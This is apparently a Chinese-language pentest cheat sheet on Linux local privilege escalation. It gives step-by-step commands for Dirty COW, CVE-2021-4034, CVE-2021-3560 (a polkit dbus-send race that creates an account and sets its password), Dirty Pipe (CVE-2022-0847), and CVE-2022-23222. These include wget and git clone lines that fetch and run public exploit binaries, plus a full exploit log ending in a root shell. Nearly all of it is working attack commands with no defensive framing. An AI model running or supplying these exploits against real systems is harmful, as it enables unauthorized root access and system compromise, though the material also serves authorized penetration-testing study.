漏洞提权

Linux脏牛提权

https://github.com/FireFart/dirtycow
$gcc -pthread dirty.c -o dirty –lcrypt
$./dirty passwd 
生成账户密码
https://github.com/gbonacini/CVE-2016-5195
$make
$./dcow -s

CVE-2021-4034

https://github.com/berdav/CVE-2021-4034
只需执行make,./cve-2021-4034然后get root shell

CVE-2021-3560

检查执行命令所需时间
>time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1
提前结束(多运行几次)
>dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1 & sleep 0.0035s ; kill $!
生成密码
>openssl passwd -5 ignite@123
执行(多运行几次)
>dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1001 org.freedesktop.Accounts.User.SetPassword string:'$5$F2KwiUlWkn2i8DC.$rw9AOjKsmK83DhncqehVUzOKVqq.ArwS2G8eQKVntv7' string:BestHackingTutorials & sleep 0.0035s ; kill $!
>su ignite
>password: ignite@123
>whoami
>id
>sudo bash获取root

CVE-2022-0847

>wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64
>./traitor-amd64 --exploit kernel:CVE-2022-0847
>whoami
>id

>git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git
>cd CVE-2022-0847-DirtyPipe-Exploit
>./compile.sh
>./exploit

CVE-2022-23222

https://github.com/tr3ee/CVE-2022-23222
$ make
cc -I include -static -w -o exploit exploit.c
$ ./exploit 
[*] phase(1/8) 'create bpf map(s)' running
[+] phase(1/8) 'create bpf map(s)' done
[*] phase(2/8) 'do some leak' running
[+] phase(2/8) 'do some leak' done
[*] phase(3/8) 'prepare arbitrary rw' running
[+] phase(3/8) 'prepare arbitrary rw' done
[*] phase(4/8) 'spawn processes' running
[+] phase(4/8) 'spawn processes' done
[*] phase(5/8) 'find cred (slow)' running
[+] phase(5/8) 'find cred (slow)' done
[*] phase(6/8) 'overwrite cred' running
[+] phase(6/8) 'overwrite cred' done
[*] phase(7/8) 'spawn root shell' running
[+] Enjoy root!
# id
uid=0(root) gid=0(root) groups=65534(nobody)
# exit
[+] phase(7/8) 'spawn root shell' done
[*] phase(8/8) 'clean up the mess' running
[+] phase(8/8) 'clean up the mess' done

最后更新于